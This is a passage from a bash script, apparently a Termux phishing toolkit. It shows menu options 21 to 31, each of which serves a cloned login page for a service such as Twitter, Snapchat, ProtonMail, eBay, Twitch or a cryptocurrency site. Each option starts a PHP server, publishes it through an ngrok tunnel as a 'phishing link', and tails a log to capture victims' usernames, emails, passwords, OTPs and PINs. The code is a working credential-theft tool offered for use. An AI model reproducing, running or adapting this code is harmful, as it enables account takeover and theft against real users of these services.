                        21)cd /data/data/com.termux/files/usr/bin/phs
                           cd twitter/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 3
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
	 	           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "phone_or_email" -e "password" -e "challenge_response"      

                           ;;
   
                       22)cd /data/data/com.termux/files/usr/bin/phs
                          cd flipcart/
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                          sleep 2
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                          ./ngrok http 4444 > /dev/null 2>&1 &
                          sleep 4
                          echo ""
                          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                          printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                          echo ""
		          ash
		          echo " "
			  echo " "
			  sleep 2
                          echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                          echo ""
                          tail -f log.txt | grep -e "email" -e "password" -e "otp"     

                          ;;
      
                       23)cd /data/data/com.termux/files/usr/bin/phs
                          cd wordpress/
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                          sleep 2
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                          ./ngrok http 4444 > /dev/null 2>&1 &
                          sleep 4
                          echo ""
                          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                          printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                          echo ""
		          ash
		          echo " "
			  echo " "
			  sleep 2
                          echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                          echo ""
                          tail -f log.txt | grep -e "log" -e "pwd"       

                           ;;

                        24)cd /data/data/com.termux/files/usr/bin/phs
                           cd snapchat/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "username" -e "password" -e "Code"       

                           ;;

                        25)cd /data/data/com.termux/files/usr/bin/phs
                           cd protonmail/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
	              	   ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "username" -e "password"   

                            ;;

               
                        26)cd /data/data/com.termux/files/usr/bin/phs
                           cd stackoverflow/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "email" -e "password"                 

                           ;;


                        27)cd /data/data/com.termux/files/usr/bin/phs
                           cd ebay/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "userid" -e "pass" -e "pin"                       

                            ;;

                        28)cd /data/data/com.termux/files/usr/bin/phs
                           cd twitch/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
 		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "Username" -e "password" -e "otp"  

                           ;;

                        29)cd /data/data/com.termux/files/usr/bin/phs
                           cd ajio/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "username" -e "password"    

                           ;;

                        30)cd /data/data/com.termux/files/usr/bin/phs
                           cd cryptocurrency/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "email" -e "password"     

                            ;;
   
               
                        31)cd /data/data/com.termux/files/usr/bin/phs
                           cd mobikwik/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "userId" -e "otp"     

                            ;;

                        99)echo -e $'\e[32m THANKYOU KEEP SUPPORTING \e[m '
                           sleep 1
                           exit
                           ;;


                           esac
                           ;;


